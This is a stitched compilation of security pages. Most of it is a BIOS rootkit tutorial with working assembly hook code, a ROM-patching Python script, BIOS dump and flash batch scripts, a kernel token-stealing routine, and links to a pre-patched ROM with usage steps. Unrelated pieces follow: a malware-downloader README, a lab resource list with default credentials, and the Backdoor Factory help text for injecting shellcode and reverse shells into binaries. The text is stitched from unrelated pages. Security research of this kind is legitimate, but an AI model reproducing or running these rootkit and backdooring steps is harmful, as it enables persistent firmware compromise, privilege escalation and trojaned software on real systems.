Sacco & Ortega patched the BIOS’s decompression module since it was already decompressed (so that it could decompress everything else), and it is called as the BIOS is loaded. This reasoning was appropriate, but the hooking techniques needed to be modified. During normal operation, the BIOS calls the decompression module once for each compressed BIOS module that is present. The VMware BIOS included 22 compressed modules, so the decompression code was called 22 times. Because our additional code resides in buffer space, the decompression module will overwrite it, so it is necessary to have our additional code relocate itself.

The process that I used includes the following steps:

  • Insert a new call at the beginning of the decompression module to our additional code.
  • Copy all of our additional code to a new section of memory.
  • Update the decompression module call to point to the new location in memory where our code is.
  • Return to the decompression module and continue execution.

This process allows for a significant amount of additional code to be included in the BIOS ROM, and for that code to run from a reliable location in memory once it has been moved there. The above four steps can be shown in a diagram as follows:
(mspaint is awesome)

Implementing this code in assembler was possible in a number of different ways, but the goal was to create code that would be as system independent as possible. To accomplish this, all absolute addressing was removed, and only near calls or jumps were used. The exceptions to this were any references to our location in free memory, as that was expected to be a fixed location regardless of the system. The following is the assembler code which was used to handle the code relocation:

start_mover:
; The following two push instructions will save the current state of the registers onto the stack.
pusha
pushf

; Segment registers are cleared as we will be moving all code to segment 0
xor ax, ax              ; (This may or may not be obvious, but xor'ing the register sets it to 0).
xor di, di
xor si, si
push cs; Push the code segment into the data segment, so we can overwrite the calling address code
pop ds; (CS is moved to DS here)
mov es, ax              ; Destination segment (0x0000)
mov di, 0x8000              ; Destination offset, all code runs from 0x8000
mov cx, 0x4fff              ; The size of the code to copy, approximated as copying extra doesn't hurt anything

; The following call serves no program flow purpose, but will cause the calling address (i.e., where this code
; is executing from) to be pushed onto the stack. This allows the code to generically patch itself no matter where it might
; be in memory. If this technique was not used, knowledge of where in memory the decompression module would be
; loaded would be required in advance (so it could be hard coded), which is not a good solution as it differs for every system.
call b

b:
pop si                  ; This will pop our current address off the stack (basically like copying the instruction pointer)
add si, 0x30                ; How far ahead we need to copy our code
rep movsw               ; This will repeat calling the movsw command until cx is decremented to 0. When this command is 
                    ; finished, our code will be copied to 0x8000
mov ax, word [esp+0x12]         ; This will get the caller address to patch the original hook
sub ax, 3               ; Backtrack to the start of the calling address, not where it left off
mov byte [eax], 0x9a            ; The calling function needs to be changed to a Call Far instead of a Call Near
add ax, 1               ; Move ahead to set a new address to be called in future
mov word [eax], 0x8000          ; The new address for this code to be called at
mov word [eax+2], 0x0000        ; The new segment (0)

; The code has now been relocated and the calling function patched, so everything can be restored and we can return.
popf
popa

; The following instructions were overwritten with the patch to the DECOMPC0.ROM module, so we need to run them now before we return.
mov bx,es
mov fs,bx
mov ds,ax
ret                 ; Updated to a near return

Once the above code is executed, it will copy itself to memory offset 0x8000, and patch the instruction which initially called it, so that it will now point to 0x8000 instead. For initially testing this code, the relocated code was simply a routine which would display a “W” to the screen (see screenshot below). The end goal however was that our rootkit code could be called instead, so the next modification was to integrate that code.

[Screenshot: the relocated test routine displaying a “W” on screen]

As noted in the earlier section, the “VBootkit” software was determined to be the best fit for the type of rootkit functionality that could be loaded from the BIOS. The VBootkit software was originally created so that it would run from a bootable CD. While this starting point is similar to running from the BIOS, there are a number of key differences. These differences are mainly based on the booting process, which is shown below:

Our BIOS based rootkit code will run somewhere in between the BIOS Entry and the BIOS Loading Complete stages. A bootkit would instead run at the last stage, starting from 0x7C00 in memory.

The VBootkit software was designed so that it would be loaded into address 0x7C00, at which point it would relocate itself to address 0x9E000. It would then hook interrupt 0x13, and would then read the first sector from the hard drive (the MBR) into 0x7C00, so that it could execute as if the bootkit was never there. This process needed to be modified so that all hard coded addresses were replaced (as the bootkit is no longer executing from 0x7C00). Additionally, there is no need to load the MBR into memory as the BIOS will do that on its own.
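The addresses in this section are easier to follow with 16 bit real-mode address arithmetic in mind, where a linear address is the segment multiplied by 16 plus the offset. The following Python 3 sketch illustrates that arithmetic only; the function names are hypothetical, and the segment:offset pair shown for 0x9E000 is just one possible encoding, not necessarily the one VBootkit uses.

```python
# Sketch only: real-mode address arithmetic (linear = segment * 16 + offset).
# Function names are hypothetical and exist purely for illustration.


def linear_address(segment, offset):
    """Convert a real-mode segment:offset pair to a linear address."""
    if not (0 <= segment <= 0xFFFF and 0 <= offset <= 0xFFFF):
        raise ValueError("segment and offset must each fit in 16 bits")
    return (segment << 4) + offset


def offset_within(linear, segment):
    """Return the 16 bit offset that reaches `linear` from `segment`."""
    offset = linear - (segment << 4)
    if not 0 <= offset <= 0xFFFF:
        raise ValueError("address is not reachable from this segment")
    return offset


if __name__ == "__main__":
    # Boot sector load address and the relocation target used earlier,
    # both reachable from segment 0.
    print(hex(linear_address(0x0000, 0x7C00)))
    print(hex(linear_address(0x0000, 0x8000)))
    # 0x9E000 does not fit in a 16 bit offset, so a non-zero segment is
    # needed; 9E00:0000 is one pair that reaches it.
    print(hex(linear_address(0x9E00, 0x0000)))
```

This is also why code that hard codes offsets relative to 0x7C00 has to be adjusted once it is copied elsewhere: the same offset lands on a different linear address whenever the segment or base changes.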

The VBootkit software hooks interrupt 0x13; that is, it replaces the address that the interrupt would normally go to with its own address, and then calls the original interrupt handler after doing additional processing. This turned out to require an additional modification, because when our BIOS rootkit code is first called interrupt 0x13 is still not fully initialized. This was overcome by storing a count in memory of how many times the decompression module had been run. If it had been run more than 22 times (for 22 modules), then the BIOS was fully initialized, and we could safely hook interrupt 0x13.

The Vbootkit software works as follows:

  • When first called it will relocate itself to 0x9E000 in memory (similar to our BIOS relocation done previously)
  • Next it will hook interrupt 0x13, which is the hard disk access interrupt
  • All hard disk activity will be examined to determine what data is being read
  • If the Windows bootloader is read from the hard disk, the bootloader code will be modified before it is stored in memory
  • The modification made to the bootloader will cause it to modify the Windows kernel. This in turn will allow arbitrary code to be injected into the Windows kernel, allowing for the privilege escalation functionality.
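For readers unfamiliar with what “hooking” an interrupt means at the data level, the following Python 3 sketch models the real-mode interrupt vector table as a plain byte array. It is a toy simulation and touches no hardware: the function names and the handler addresses are hypothetical. The layout it relies on is the standard one, with each vector occupying 4 bytes at linear address `interrupt * 4`, stored as a 16 bit offset followed by a 16 bit segment.

```python
# Sketch only: a toy model of the real-mode interrupt vector table (IVT).
# Nothing here touches real memory; names and addresses are hypothetical.
import struct

IVT_ENTRY_SIZE = 4  # each vector: 16 bit offset, then 16 bit segment


def vector_address(interrupt):
    """Linear address of the IVT entry for the given interrupt number."""
    return interrupt * IVT_ENTRY_SIZE


def read_vector(memory, interrupt):
    """Return the (segment, offset) currently stored for an interrupt."""
    offset, segment = struct.unpack_from("<HH", memory, vector_address(interrupt))
    return segment, offset


def write_vector(memory, interrupt, segment, offset):
    """Store a new (segment, offset) handler address for an interrupt."""
    struct.pack_into("<HH", memory, vector_address(interrupt), offset, segment)


def hook_vector(memory, interrupt, new_segment, new_offset):
    """Redirect a vector and return the old handler address.

    The old address is what a replacement handler would chain to after
    doing its own processing.
    """
    original = read_vector(memory, interrupt)
    write_vector(memory, interrupt, new_segment, new_offset)
    return original


if __name__ == "__main__":
    memory = bytearray(256 * IVT_ENTRY_SIZE)       # simulated IVT only
    write_vector(memory, 0x13, 0xF000, 0x1234)     # pretend BIOS disk handler
    saved = hook_vector(memory, 0x13, 0x9E00, 0x0000)
    print(hex(vector_address(0x13)), saved, read_vector(memory, 0x13))
```

The same model explains the timing problem described above: if the table entry is rewritten before the BIOS has installed its own handler, the saved “original” address is meaningless and the BIOS may later overwrite the hook.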

With our BIOS injection plus the bootkit loaded the process flow happens as follows:

The result of all of these modifications is a BIOS which copies the bootkit into memory and executes it, loads the OS from the hard drive, and then ends with an OS which has been modified so that certain processes will run with additional privileges. The following screenshot shows the bootkit code displaying a message once it finds the bootloader and the kernel and successfully patches them:

[Screenshot: the bootkit message displayed after the bootloader and kernel have been patched]

The code used for this rootkit was set to check for any process named “pwn.exe”, and if found, give it additional privileges. This is done every 30 seconds, so the differences in privileges are easy to see. This function can be seen in the code and screenshot below:

xor ecx,ecx
mov word cx, [CODEBASEKERNEL + Imagenameoffset]
cmp dword [eax+ecx], "PWN."         ; Check if the process is named PWN.exe
je patchit
jne donotpatchtoken             ; jmp takes 5 bytes but this takes 2 bytes

patchit:
mov word cx, [CODEBASEKERNEL + SecurityTokenoffset]
mov dword [eax + ecx],ebx       ; replace it with services.exe token, offset for sec token is 200

[Screenshot: the pwn.exe process after its privileges have been raised]

The BIOS rootkit which has been developed could definitely include more functionality (such as what is included in Vbootkit2), but still acts as an effective rootkit in its current state.

BIOS Decompression and Patching

Now that we know how we want the rootkit to be injected into the BIOS, the next step is to actually patch the BIOS with our rootkit code. To do this we need to extract all of the BIOS modules, patch the decompression module, and reassemble everything. The modules can be extracted using the phnxdeco command line tool, or the Phoenix BIOS Editor. Once the decompression module is extracted, the following code will patch it with our rootkit:

#!/usr/bin/python
import os,struct,sys
###############################################
# BIOS Decompression module patching script - By Wesley Wineberg
#
# The Phoenix BIOS Editor application (for Windows) will generate a number of module files
# including the decompression module which will be named "DECOMPC0.ROM". These files are
# saved to C:\Program Files\Phoenix Bios Editor\TEMP (or similar) once a BIOS WPH file is
# opened. The decompression module file can be modified with this script. Once modified,
# any change can be made to the BIOS modules in the BIOS editor so that a new BIOS WPH file
# can be generated by the BIOS editor. The decompression module can alternatively be
# extracted by phnxdeco.exe, but this does not allow for reassembly. This script requires
# that NASM be present on the system it is run on.
#
# INPUT:
# This patching script requires the name and path to the BIOS rootkit asm file to be passed
# as an argument on the command line.
#
# OUTPUT:
# This script will modify the DECOMPC0.ROM file located in the same directory as the script
# so that it will run the BIOS rootkit asm code.
# Display usage info
if len(sys.argv) < 2:
    print "Modify and rebuild Phoenix BIOS DECOMPC0.ROM module. Rootkit ASM code filename required!"
    exit(0)
# Find rootkit code name
shellcode = sys.argv[1].lower()
# Assemble the assembler code to be injected. NASM is required to be present on the system
# or this will fail!
os.system('nasm %s' % shellcode)
# Open and display the size of the compiled rootkit code
shellcodeout = shellcode[0:len(shellcode)-4]
decomphook = open(shellcodeout,'rb').read()
print "Rootkit code loaded: %d bytes" % len(decomphook)
# The next line contains raw assembly instructions which will be placed 0x23 into the
decompression rom
# file. The decompression rom contains a header, followed by a number of push instructions
and then
# a CLD instruction. This code will be inserted immediately after, and will overwrite a
number of
# mov instructions. These need to be called by the rootkit code before it returns so that
#the normal decompression functions can continue.
# The assembler instruction contained below is a Near Call which will jump to the end of the
# decompression rom where the rootkit code has been inserted. This is followed by three NOP
# instructions as filler.
minihook = '\xe8\x28\x04\x90\x90\x90'
# The following would work but is an absolute call, not ideal!
# minihook = '\x9a\x5A\x04\xDC\x64\x90' # call far +0x45A
# Load the decompression rom file
decorom = open('DECOMPC0.ROM','rb').read()
# Hook location is 0x23 in to the file, just past the CLD instruction

hookoffset=0x23
# Insert hook contents into the decompression rom, overwriting what was there previously
decorom = decorom[:hookoffset]+minihook+decorom[len(minihook)+hookoffset:]
# Pad the decompression rom with 100 NOP instructions. This is not needed, but does make it
# easier to identify where the modification has taken place.
decorom+="\x90"*100+decomphook
# Pad an additional 10 NOP's at the end.
decorom=decorom+'\x90'*10
# Recalculate the ROM size, so that the header can be updated
decorom=decorom[:0xf]+struct.pack("<H",len(decorom)-0x1A)+decorom[0x11:]
# Save the patched decompression rom over the previous copy
out=open('DECOMPC0.ROM','wb')
out.write(decorom)
out.close()
# Output results
print "The DECOMPC0.ROM file has now been patched."

An example of how to call the above script would be:

python patchdecomp.py biosrootkit.asm

If everything works successfully, you should see something similar to the following:

Rootkit code loaded: 1845 bytes
The DECOMPC0.ROM file has now been patched.

BIOS Reassembly

For raw BIOS files, such as the one included with VMware, a number of command line utilities included with the Phoenix Bios Editor (or available from Intel) can be used to reassemble everything. Later on when testing with a real PC it was necessary to save the BIOS in more than just the raw format, so the tool for reassembly used was the GUI version of the Phoenix Bios Editor. This unfortunately means that it is not possible to simply have one application that can be run on a system which will infect the BIOS, at least not using off the shelf tools.

This now means that the BIOS infection is a three stage process, requiring some manual intervention mainly for the reassembly. The following shows the Phoenix BIOS Editor with a BIOS image open:

[Figure 7: screenshot of the Phoenix BIOS Editor with a BIOS image open]

The Phoenix BIOS Editor is not specifically designed for swapping modules in and out, but does effectively allow for it. When a BIOS image is first opened, all of the BIOS modules will be extracted to disk in a folder located at C:\Program Files\Phoenix BIOS Editor\TEMP. The decompression module can be copied from this folder, patched, and replaced. The Phoenix BIOS Editor will not allow you to save a BIOS without a modification, so it is necessary to modify a string value and then change it back (or just leave it) so that the BIOS can be saved.

The BIOS based rootkit source code and patching scripts can be downloaded from the links near the end of this write-up if you would like to try all of this out yourself.

Real PCs

The Phoenix BIOS was used for all of the VMware-based development, so it was also chosen for testing on a physical PC. All of the physical (as opposed to virtual) BIOS testing was done on an HP Pavilion ze4400 laptop. BIOS testing was originally planned for desktop PCs rather than laptops, since getting access to a desktop motherboard for reflashing, if necessary, would be much easier. However, quickly locating a desktop PC with a Phoenix BIOS proved difficult, so a laptop was used instead (special thanks to David for reflashing my laptop when I accidentally wrote source code to my BIOS!).

PC BIOS Retrieval

The first step to modifying a real system BIOS is to extract a copy of it. Phoenix generally provides two different tools for this purpose: “Phlash16” and “WinPhlash”. Phlash16 is a command line utility (with a console based GUI), but it will only run from DOS. WinPhlash, as its name suggests, runs from Windows. While it is a GUI based utility, it also accepts command line options, which allows us to automate the process of BIOS retrieval. For this project I ended up making some scripts to automate BIOS extraction and patching, but they’re quite basic and limited.

The following batch script will copy the BIOS into a file named BIOSORIG.WPH, and then check whether it has previously been modified. The CheckFlash.py Python script simply checks the BIOS contents for my name, which would not be in any unpatched BIOS.

@rem This file dumps the bios and checks if it has previously been patched.
@rem Dump
WinPhlash\WinPhlash.exe /ro=BIOSORIG.WPH
@rem Check if the BIOS has been patched already
Python\PortablePython_1.1_py2.6.1\App\python CheckFlash.py WinPhlash\BIOSORIG.WPH
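
The CheckFlash.py script itself is not reproduced in this write-up. As a rough illustration of the kind of check described above (looking for a known marker string inside a dumped image), here is a minimal sketch. The function name `contains_marker` and the marker value used in the usage note are hypothetical and are not taken from the original script.

```python
def contains_marker(path, marker):
    """Return True if the file at `path` contains the byte string `marker`.

    Hypothetical helper: the real CheckFlash.py is not shown in the article,
    so this only illustrates the idea of scanning a dump for a known string.
    """
    with open(path, "rb") as handle:
        # A BIOS dump is small enough to read into memory in one go.
        return marker in handle.read()
```

Calling `contains_marker("BIOSORIG.WPH", b"SomeAuthorName")` would then report whether the dump already carries the marker, where both the file name and the marker bytes are placeholders.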

PC BIOS Decompression and Patching

With the BIOS retrieved, the next step is to patch it with our rootkit code. This can be done using the exact same scripts that we used for VMware in the sections above. It was a goal of this project to design the patch as well as the patching process to be as compatible as possible. I am quite pleased that this turned out to be completely possible, so that the same tools can be used for completely different hardware running the same type of BIOS.

PC BIOS Reassembly

While there is a free tool which can extract modules from Phoenix BIOS’s, it appears that only the Phoenix Bios Editor will reassemble them as needed for typical PC’s. The WinPhlash tool requires additional information to be included with the BIOS, which it stores along with the raw BIOS in the WPH file. After testing many different options, it appears that the only way to successfully reassemble the WPH file is to use the GUI Phoenix Bios Editor. This unfortunately means that it is not possible to simply have one application that can be run on a system which will infect the BIOS, at least not using off the shelf tools.

Theoretically it should be possible to reverse engineer the WPH format and create a custom BIOS reassembly tool, but this was out of the scope of this project. Instead, the BIOS infection is a three stage process, requiring some manual intervention mainly for the reassembly.

As with patching the VMware BIOS, the same trick to have the Phoenix BIOS Editor reassemble a patched module can be used. When a BIOS image is first opened, all of the BIOS modules will be extracted to disk in a folder located at C:\Program Files\Phoenix BIOS Editor\TEMP. The decompression module can be copied from this folder, patched, and replaced. The Phoenix BIOS Editor will not allow you to save a BIOS without a modification, so it is necessary to modify a string value and then change it back (or just leave it) so that the BIOS can be saved.

BIOS Flashing

Once the BIOS is reassembled into the WPH file, the following batch script will flash the new BIOS image into the BIOS EEPROM and then reboot the PC so that it takes effect:

@rem This file uploads a file named "BIOSPATCHED.WPH" to the BIOS. Will reboot system when done.
WinPhlash\WinPhlash.exe /bu=BIOSBACKUP.WPH /I BIOSPATCHED.WPH

Laptop Modification Results

With everything described so far put together, the following shows the BIOS code being flashed onto a laptop (being run from the infect.bat script detailed above):

[Figure 8: screenshot of the patched BIOS being flashed onto the laptop]

Once the flash completed, the BIOS rootkit successfully ran and loaded itself into the Windows kernel. The following screenshot shows a command prompt which starts initially as a normal user, and then after 30 seconds has its privileges escalated:

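[Figure 9: screenshot of a command prompt that starts as a normal user and has its privileges escalated after 30 seconds]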

This demonstrated that the BIOS rootkit was portable enough to work on multiple systems (VMware, the HP laptop), and that the infection mechanisms were functional and working properly.

The “rootkit” developed for this project only implements one simple task, but as noted regarding the Vbootkit2 software, there is no reason additional functionality cannot be added to this. BIOS’s made by Phoenix were examined for this project, and it is likely that there are many similarities between Phoenix BIOS’s and BIOS’s from other manufacturers. While it is likely that code will need to be created for each separate manufacturer, there are not a large number of different BIOS vendors, so expanding this rootkit functionality to all of the common manufacturers should be feasible.

In the introduction I noted that new BIOS features, such as signed BIOS updates, make much of what is described here far less of an issue from a security standpoint. That is definitely good to see, but it is also worth remembering that there are more “legacy” computers out there than there are “new” ones, so this type of attack will still remain an issue for quite a while to come.

Demo VMware BIOS and source code

The following source code and patched BIOS are provided as a proof of concept. It is in no way my intention that people take this and use it for any malicious purposes, but rather to demonstrate that such attacks are completely feasible on older BIOS configurations. I do not expect that it is very feasible to take this in its current form and turn it into any sort of useful malware, and based on that I am posting this code online.

As noted in the earlier sections, this code should work to patch most “Phoenix” BIOS’s. The patching scripts can be downloaded here:
BIOS_Based_Rootkit_Patch_Scripts.zip

The source code for the BIOS rootkit can be downloaded here:
biosrootkit.asm

You will need NASM to compile the code to patch into the BIOS if you are using the above scripts / source code. NASM should either be added to your path variable, or you should update the patching script to use an absolute path to it. You will also need a copy of the Phoenix BIOS Editor, or an equivalent free tool, to combine the decompression module back into a complete BIOS.

If you don’t want to compile this all yourself and would simply like to try it, a pre-patched BIOS for use with VMware can be downloaded here:
BIOS_rootkit_demo.ROM

PoC Usage and Notes

If you don’t feel like reading through the whole write-up above, here is the summary of how to try this out, and what it does.

  • First, download the BIOS_rootkit_demo.ROM BIOS image from the above link.
  • To try it, you need a copy of VMware installed, and a guest Windows XP operating system to test with. I’ve personally tested this with a bunch of different versions of VMware Workstation, as well as the latest version of VMware Player (which is free). I am also told that VMware Fusion works just fine too.
  • Before opening your guest WinXP VM, browse to where you have the VM stored on your computer, and open the .vmx file (i.e. WindowsXP.vmx or whatever your VM is called) in Notepad. Add a new line at the end that matches the following: bios440.filename = "BIOS_rootkit_demo.ROM". Make sure you copy BIOS_rootkit_demo.ROM to that folder while you’re at it.
  • Now open and start the VM, then rename a program to pwn.exe (cmd.exe for example).
  • Wait 30 seconds, and then start the Task Manager. Pwn.exe should be running as user “SYSTEM” now instead of whatever user you are logged into XP with.

The list of steps described above should work in an ideal world. Testing has shown the following caveats however!

  • OS instability. Sometimes when booting or just simply closing your pwn.exe application Windows will BSOD.
  • Task Manager will lie about your process user if you open it in advance of the 30s permission escalation time. Use something like cmd with whoami to properly check what your permissions are.
  • While I have loaded this successfully onto a real PC, I take no responsibility for the results if you do the same. I’d love to hear about it if you brick your motherboard in some horrendous way, but I probably won’t actually be able to help you with it! Use at your own risk!
  • If you just want to watch a video of what this does, Colin has put one up on YouTube:

    I recommend actually trying it in VMware, it’s way more fun to see a hard drive wipe do nothing, and your system still affected!

TROOPERS 15 – Video Footage


TROOPERS15 Video Footage

Troopers15 is the eighth edition of the great IT-Security Conference, where the world’s leading IT-Security experts and Hackers present their latest research.

Troopers provides a networking platform for Security interested people from all over the world and enables security folks from the industry, academia and the research community to exchange knowledge and talk about their work. Again, Troopers15 is going to be an event unlike most other “security conferences”: No pointless marketing talks, just high-end workshops with hands-on experiences and most importantly: You’ll get real answers and practical benefits to meet today’s and tomorrow’s threats.

Maltrieve – A tool to retrieve malware directly from the source for security researchers.


Maltrieve

Maltrieve originated as a fork of mwcrawler.

This tool retrieves malware directly from the sources as listed at a number of sites, including:

These lists will be implemented if/when they return to activity.

Improvements

  • Proxy support
  • Multithreading for improved performance
  • Logging of source URLs
  • Multiple user agent support
  • Better error handling
  • VxCage and Cuckoo Sandbox support

Dependencies

Usage

Basic execution: python maltrieve.py

Options

usage: maltrieve.py [-h] [-p PROXY] [-d DUMPDIR] [-l LOGFILE] [-x] [-c]

optional arguments:
  -h, --help            show this help message and exit
  -p PROXY, --proxy PROXY
                        Define HTTP proxy as address:port
  -d DUMPDIR, --dumpdir DUMPDIR
                        Define dump directory for retrieved files
  -l LOGFILE, --logfile LOGFILE
                        Define file for logging progress
  -x, --vxcage          Dump the file to a VxCage instance running on the
                        localhost
  -c, --cuckoo          Enable cuckoo analysis
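
The help text above has the shape that Python's argparse module produces. As an illustration only, the sketch below declares a parser with the same flags. It is not taken from the Maltrieve source, and the function name `build_parser` and the default values are assumptions.

```python
import argparse


def build_parser():
    """Build a parser mirroring the options listed in the help text.

    Illustrative only: this is not the actual Maltrieve code, and the
    defaults (None / False) are assumptions.
    """
    parser = argparse.ArgumentParser(prog="maltrieve.py")
    parser.add_argument("-p", "--proxy",
                        help="Define HTTP proxy as address:port")
    parser.add_argument("-d", "--dumpdir",
                        help="Define dump directory for retrieved files")
    parser.add_argument("-l", "--logfile",
                        help="Define file for logging progress")
    parser.add_argument("-x", "--vxcage", action="store_true",
                        help="Dump the file to a VxCage instance running on the localhost")
    parser.add_argument("-c", "--cuckoo", action="store_true",
                        help="Enable cuckoo analysis")
    return parser
```

For example, `build_parser().parse_args(["-d", "samples", "-x"])` yields a namespace with `dumpdir` set to `"samples"` and `vxcage` set to `True`.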

More information can be found at: https://github.com/krmaxwell/maltrieve

Documents and Videos + LiveCD from hacking-lab.com


Documents and Videos from hacking-lab.com

Date Type Description Author
2014 pdf Fritzbox Security Analysis by bias bias
2014 pdf How to setup a VirtualBox Server by bias bias
2014 pdf Hacky Easter 2013 Solutions and Write-Ups PS
2012 Dec pdf Hacking-Lab Magazine 3 E1
2012 July pdf Hacking-Lab Magazine 2 E1
2012 Mar pdf Hacking-Lab Magazine 1 E1
2010 May pdf Find Differences with Integrity Checking Software (AIDE) E1
2010 Mar pdf SSH Shell Monitoring on Solaris10 E1
2010 Mar pdf Windows DNS Tunneling Attack & Virus Construction Kit E1
2010 Feb pdf XSS in .NET ViewState Education Movie +  pdf Intro PDF  + pdf High Resolution MOVIE Afames
2010 Feb pdf MCTA (German) Slides Mobile Devices Security Superhacker
2010 Jan pdf Movie: Observation Firefox Plugin E1
2010 Jan pdf Movie: PART 2: Reverse Proxy for Facebook & Pre-Auth & Session Hiding (KnowHow) E1
2010 Jan pdf Convert GeoIP ip ranges for your security tool E1
2010 Jan pdf Movie: PART 1: Reverse Proxy for Facebook (KnowHow) E1
2009 Dec pdf Movie: Etterfilter – Injection malicious payload into web traffic (MitM) iMan
2009 Nov pdf Movie: SSL Renegotiation Attack E1
2009 Nov pdf Movie: We are all frogs (surveillance awareness) Viktor
2009 Nov pdf Defense in-depth – Better protection against 0-day exploitation E1
2009 Nov pdf Übles Incident Management bei STRATO – Java Script E1
2009 Oct pdf Multiple Firefox Instances – German Text E1
2009 Oct pdf Hacking-Lab – Bericht in Network Computing DE  remove
2009 Sep pdf Wie erstellt man eine Mac OS X Anwendung aus einem JAR File  x3l
2009 Sep pdf Logfile Monitoring using Swatch  E1
2009 Sep pdf Set-Cookie: Path is not a Security Boundary  E1
2009 Sep pdf Using Nmap results in Metasploit and start db_autopwn  E1
2009 Sep pdf Add your own ruby scripts to the MetaSploit 3 framework  E1
2009 Aug pdf Analyzing NMAP 5 results with MySQL  E1
2009 Aug pdf Using NMAP Output (XML) in Nessus Scans  E1
2009 Jun pdf Social Engineering Test Cases  E1
2009 Jun pdf Challenge of the Month – June 2009 – Windows Privilege Escalation  E1
2009 May pdf Character Conversion (UTF-7, UTF-8) using recode (Apache < 2.2.6 XSS)  E1

For some of the downloads you would need to open a free user account on hacking-lab.com


Research Papers

Cat. Title Description Rating Files Published Author
Web Security, Programming 10000 Java Web Application Protection Framework Evaluation: AntiSamy, catnip, GreatWebGuy, XSS filter
2012-11-15 07:55:34 PS
Malware 10001 General Malware Analysis History Of Malware
2013-04-24 10:04:24 dreadknight
Malware 10001 General Malware Analysis Quick Analysis of an Online Banking Trojan by PS
2013-05-15 11:32:32 PS
Web Security 10002 Research: Advanced SQL Injection Advanced SQL Injection Attacks & Mitigation
2014-01-04 10:35:08 PS

Hacking-Lab LiveCD

Hacking-Lab LiveCD, get it from: http://media.hacking-lab.com/largefiles/livecd

This is the LiveCD project of Hacking-Lab (www.hacking-lab.com).
It gives you OpenVPN access into Hacking-Lab's Remote Security Lab. 
The LiveCD ISO image runs very well natively on a host OS, or within a 
virtual environment (VMware, VirtualBox). However, if you expect 
improved screen resolution and drag and drop support with your host OS, 
we recommend using a VirtualBox appliance. 

Please read the following readme to get familiar with downloading
and using the LiveCD ISO image or VirtualBox appliance.
* http://media.hacking-lab.com/largefiles/livecd/readme.txt


LiveCD Release 8.00 and above
=====================================================

username = hacker
password = compass
root password = compass

apt-get update
apt-get upgrade
apt-get dist-upgrade



OpenVPN Question
=====================================================
You will gain VPN access if both of the following prerequisites are fulfilled. 

a) you have a valid hacking-lab username and password
b) you are registered for a vpn enabled event 

Please note: if your account is *NOT* assigned to a running Hacking-Lab event,
you cannot connect using OpenVPN (even if your password is valid!). Unfortunately,
the OpenVPN error will tell you that your username or password is invalid.


LiveCD Updates
=====================================================
The LiveCD will get updated once per month. We dislike the idea of 
letting you use an outdated Linux distro (old kernels and more).
Please make sure you get the latest LiveCD from here from time to time.

Our update mechanism includes
a) updating ubuntu packages
b) updating metasploit (svn update)
c) updating browser
d) updating kernel 

-> this process is fully automated. We can create new ISO images in 10 minutes. Please
tell us if you are missing a tool or if something is not as expected.

The Backdoor Factory (BDF) – Patch PE, ELF, Mach-O binaries with shellcode


The Backdoor Factory (BDF)

For security professionals and researchers only.

The goal of BDF is to patch executable binaries with user desired shellcode and continue normal execution of the prepatched state.

DerbyCon 2014 Presentation: http://www.youtube.com/watch?v=LjUN9MACaTs

Contact the developer on:

IRC:
irc.freenode.net #BDFactory 

Twitter:
@midnite_runr

Under a BSD 3 Clause License

See the wiki: https://github.com/secretsquirrel/the-backdoor-factory/wiki

Dependencies

Capstone engine can be installed from PyPi with:

sudo pip install capstone

Pefile, most recent: https://code.google.com/p/pefile/

Kali Install:

  apt-get update
  apt-get install backdoor-factory

Other *NIX/MAC INSTALL:

./install.sh

This will install Capstone 3.01 and use pip to install pefile.

UPDATE:

./update.sh

Supporting:

Windows PE x86/x64,ELF x86/x64 (System V, FreeBSD, ARM Little Endian x32), 
and Mach-O x86/x64 and those formats in FAT files

Packed Files: PE UPX x86/x64

Experimental: OpenBSD x32 

Some executables have built-in protections, so this will not work on all binaries. It is advisable that you test target binaries before deploying them to clients or using them in exercises. I’m on the verge of bypassing NSIS, so bypassing these checks will be included in the future.

Many thanks to Ryan O'Neill --ryan 'at' codeslum <d ot> org--
Without him, I would still be trying to do stupid things 
with the elf format.
Also thanks to Silvio Cesare with his 1998 paper 
(http://vxheaven.org/lib/vsc01.html) which these ELF patching
techniques are based on.

From DerbyCon:

Video: http://www.youtube.com/watch?v=jXLb2RNX5xs

Injection Module Demo: http://www.youtube.com/watch?v=04aJAex2o3U

Slides: http://www.slideshare.net/midnite_runr/patching-windows-executables-with-the-backdoor-factory

Recently tested on many binaries.

./backdoor.py -h
Usage: backdoor.py [options]

Options:
  -h, --help            show this help message and exit
  -f FILE, --file=FILE  File to backdoor
  -s SHELL, --shell=SHELL
                        Payloads that are available for use. Use 'show' to see
                        payloads.
  -H HOST, --hostip=HOST
                        IP of the C2 for reverse connections.
  -P PORT, --port=PORT  The port to either connect back to for reverse shells
                        or to listen on for bind shells
  -J, --cave_jumping    Select this options if you want to use code cave
                        jumping to further hide your shellcode in the binary.
  -a, --add_new_section
                        Mandating that a new section be added to the exe
                        (better success) but less av avoidance
  -U SUPPLIED_SHELLCODE, --user_shellcode=SUPPLIED_SHELLCODE
                        User supplied shellcode, make sure that it matches the
                        architecture that you are targeting.
  -c, --cave            The cave flag will find code caves that can be used
                        for stashing shellcode. This will print to all the
                        code caves of a specific size.The -l flag can be use
                        with this setting.
  -l SHELL_LEN, --shell_length=SHELL_LEN
                        For use with -c to help find code caves of different
                        sizes
  -o OUTPUT, --output-file=OUTPUT
                        The backdoor output file
  -n NSECTION, --section=NSECTION
                        New section name must be less than seven characters
  -d DIR, --directory=DIR
                        This is the location of the files that you want to
                        backdoor. You can make a directory of file backdooring
                        faster by forcing the attaching of a codecave to the
                        exe by using the -a setting.
  -w, --change_access   This flag changes the section that houses the codecave
                        to RWE. Sometimes this is necessary. Enabled by
                        default. If disabled, the backdoor may fail.
  -i, --injector        This command turns the backdoor factory in a hunt and
                        shellcode inject type of mechinism. Edit the target
                        settings in the injector module.
  -u SUFFIX, --suffix=SUFFIX
                        For use with injector, places a suffix on the original
                        file for easy recovery
  -D, --delete_original
                        For use with injector module.  This command deletes
                        the original file.  Not for use in production systems.
                        *Author not responsible for stupid uses.*
  -O DISK_OFFSET, --disk_offset=DISK_OFFSET
                        Starting point on disk offset, in bytes. Some authors
                        want to obfuscate their on disk offset to avoid
                        reverse engineering, if you find one of those files
                        use this flag, after you find the offset.
  -S, --support_check   To determine if the file is supported by BDF prior to
                        backdooring the file. For use by itself or with
                        verbose. This check happens automatically if the
                        backdooring is attempted.
  -M, --cave-miner      Future use, to help determine smallest shellcode
                        possible in a PE file
  -q, --no_banner       Kills the banner.
  -v, --verbose         For debug information output.
  -T IMAGE_TYPE, --image-type=IMAGE_TYPE
                        ALL, x86, or x64 type binaries only. Default=ALL
  -Z, --zero_cert       Allows for the overwriting of the pointer to the PE
                        certificate table effectively removing the certificate
                        from the binary for all intents and purposes.
